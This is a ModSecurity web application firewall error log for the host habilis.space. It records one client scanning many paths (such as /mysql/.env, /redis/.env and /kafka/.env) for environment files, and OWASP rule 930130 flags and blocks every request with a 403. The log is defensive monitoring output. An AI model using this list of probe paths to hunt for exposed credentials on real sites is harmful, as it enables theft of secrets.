[Mon May 11 17:33:56.298017 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /travis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/travis/.env"] [unique_id "agH25Py_GXSWIKeli0sMegAAAI8"]
[Mon May 11 17:33:56.298208 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/travis/.env"] [unique_id "agH25Py_GXSWIKeli0sMegAAAI8"]
[Mon May 11 17:33:56.298411 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25Py_GXSWIKeli0sMegAAAI8"]
[Mon May 11 17:33:56.418947 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /buildkite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/buildkite/.env"] [unique_id "agH25Py_GXSWIKeli0sMewAAAI8"]
[Mon May 11 17:33:56.419187 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/buildkite/.env"] [unique_id "agH25Py_GXSWIKeli0sMewAAAI8"]
[Mon May 11 17:33:56.419427 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25Py_GXSWIKeli0sMewAAAI8"]
[Mon May 11 17:33:56.531813 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mysql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/mysql/.env"] [unique_id "agH25Py_GXSWIKeli0sMfAAAAI8"]
[Mon May 11 17:33:56.532039 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/mysql/.env"] [unique_id "agH25Py_GXSWIKeli0sMfAAAAI8"]
[Mon May 11 17:33:56.532271 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25Py_GXSWIKeli0sMfAAAAI8"]
[Mon May 11 17:33:56.645369 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /postgres/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/postgres/.env"] [unique_id "agH25Py_GXSWIKeli0sMfQAAAI8"]
[Mon May 11 17:33:56.645597 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/postgres/.env"] [unique_id "agH25Py_GXSWIKeli0sMfQAAAI8"]
[Mon May 11 17:33:56.645825 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25Py_GXSWIKeli0sMfQAAAI8"]
[Mon May 11 17:33:56.759392 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mongodb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/mongodb/.env"] [unique_id "agH25Py_GXSWIKeli0sMfgAAAI8"]
[Mon May 11 17:33:56.759623 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/mongodb/.env"] [unique_id "agH25Py_GXSWIKeli0sMfgAAAI8"]
[Mon May 11 17:33:56.759852 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25Py_GXSWIKeli0sMfgAAAI8"]
[Mon May 11 17:33:57.085849 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /redis/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/redis/.env"] [unique_id "agH25fy_GXSWIKeli0sMfwAAAI8"]
[Mon May 11 17:33:57.086069 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/redis/.env"] [unique_id "agH25fy_GXSWIKeli0sMfwAAAI8"]
[Mon May 11 17:33:57.086297 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25fy_GXSWIKeli0sMfwAAAI8"]
[Mon May 11 17:33:57.213480 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /elasticsearch/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/elasticsearch/.env"] [unique_id "agH25fy_GXSWIKeli0sMgAAAAI8"]
[Mon May 11 17:33:57.213689 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/elasticsearch/.env"] [unique_id "agH25fy_GXSWIKeli0sMgAAAAI8"]
[Mon May 11 17:33:57.213904 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25fy_GXSWIKeli0sMgAAAAI8"]
[Mon May 11 17:33:57.324745 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rabbitmq/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/rabbitmq/.env"] [unique_id "agH25fy_GXSWIKeli0sMgQAAAI8"]
[Mon May 11 17:33:57.324973 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/rabbitmq/.env"] [unique_id "agH25fy_GXSWIKeli0sMgQAAAI8"]
[Mon May 11 17:33:57.325218 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25fy_GXSWIKeli0sMgQAAAI8"]
[Mon May 11 17:33:57.436076 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kafka/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/kafka/.env"] [unique_id "agH25fy_GXSWIKeli0sMggAAAI8"]
[Mon May 11 17:33:57.436320 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/kafka/.env"] [unique_id "agH25fy_GXSWIKeli0sMggAAAI8"]
[Mon May 11 17:33:57.436583 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25fy_GXSWIKeli0sMggAAAI8"]
[Mon May 11 17:33:57.549484 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /queue/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/queue/.env"] [unique_id "agH25fy_GXSWIKeli0sMgwAAAI8"]
[Mon May 11 17:33:57.549708 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/queue/.env"] [unique_id "agH25fy_GXSWIKeli0sMgwAAAI8"]
[Mon May 11 17:33:57.549922 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25fy_GXSWIKeli0sMgwAAAI8"]
[Mon May 11 17:33:57.675244 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /worker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/worker/.env"] [unique_id "agH25fy_GXSWIKeli0sMhQAAAI8"]
[Mon May 11 17:33:57.675472 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/worker/.env"] [unique_id "agH25fy_GXSWIKeli0sMhQAAAI8"]
[Mon May 11 17:33:57.675705 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25fy_GXSWIKeli0sMhQAAAI8"]
[Mon May 11 17:33:57.788600 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /job/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/job/.env"] [unique_id "agH25fy_GXSWIKeli0sMhgAAAI8"]
[Mon May 11 17:33:57.788825 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/job/.env"] [unique_id "agH25fy_GXSWIKeli0sMhgAAAI8"]
[Mon May 11 17:33:57.789060 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25fy_GXSWIKeli0sMhgAAAI8"]
[Mon May 11 17:33:57.902913 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/test/.env"] [unique_id "agH25fy_GXSWIKeli0sMhwAAAI8"]
[Mon May 11 17:33:57.903174 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/test/.env"] [unique_id "agH25fy_GXSWIKeli0sMhwAAAI8"]
[Mon May 11 17:33:57.903411 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH25fy_GXSWIKeli0sMhwAAAI8"]
[Mon May 11 17:33:58.026491 2026] [security2:error] [pid 1411201:tid 1411261] [client 3.15.40.244:43530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /qa/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/qa/.env"] [unique_id "agH25vy_GXSWIKeli0sMiQAAAI8"]
